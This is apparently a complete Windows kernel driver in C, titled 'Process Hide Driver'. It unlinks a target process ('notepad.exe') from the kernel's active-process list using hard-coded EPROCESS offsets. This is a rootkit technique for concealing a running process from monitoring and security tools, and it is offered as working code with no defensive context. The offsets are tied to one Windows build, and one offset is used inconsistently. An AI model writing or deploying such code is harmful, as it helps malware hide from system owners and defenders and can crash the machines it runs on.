[Win] Process Hide Driver

#include <ntifs.h> VOID Unload(_In_ PDRIVER_OBJECT pDriverObject) { UNREFERENCED_PARAMETER(pDriverObject); DbgPrint("Driver Unload\n"); return; } NTSTATUS DriverEntry( _In_ PDRIVER_OBJECT pDriverObject, _In_ PUNICODE_STRING pRegistryPath ) { UNREFERENCED_PARAMETER(pDriverObject); UNREFERENCED_PARAMETER(pRegistryPath); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[Driver Load]\n"); PEPROCESS eped = NULL; eped = (PEPROCESS)PsGetCurrentProcess(); PLIST_ENTRY pNode, pBuf; pNode = NULL; pBuf = NULL; unsigned char* peped = NULL; peped = (unsigned char*)eped; pNode = pBuf = (PLIST_ENTRY)(peped + 0x2e8); while (1) { if (strncmp("notepad.exe", (const char*)((unsigned char*)pNode + 0x168), 14) == 0) { DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[Process Name is (%s)]\nBefore\n",(const char*)((unsigned char*)pNode + 0x160)); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[pBuf->Flink = %p]\n", (const char*)((unsigned char*)pBuf->Flink)); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[pNode->Blink = %p]\n", (const char*)((unsigned char*)pNode->Flink)); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[pNode->Flink->Blink = %p]\n", (const char*)((unsigned char*)pNode->Flink->Blink)); pBuf->Flink = pNode->Flink; pNode->Flink->Blink = pNode->Blink; pNode->Flink = pNode; pNode->Blink = pNode; DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "After \n[pBuf->Flink = %p]\n", (const char*)((unsigned char*)pBuf->Flink)); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[pNode->Flink = %p]\n", (const char*)((unsigned char*)pNode->Flink)); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[pNode->Flink->Blink = %p]\n", (const char*)((unsigned char*)pNode->Flink->Blink)); DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "[pNode->Flink = %p]\n", (const char*)((unsigned char*)pNode->Blink)); break; } pBuf = pNode; pNode = pNode->Flink; } pDriverObject->DriverUnload = Unload; return STATUS_SUCCESS; }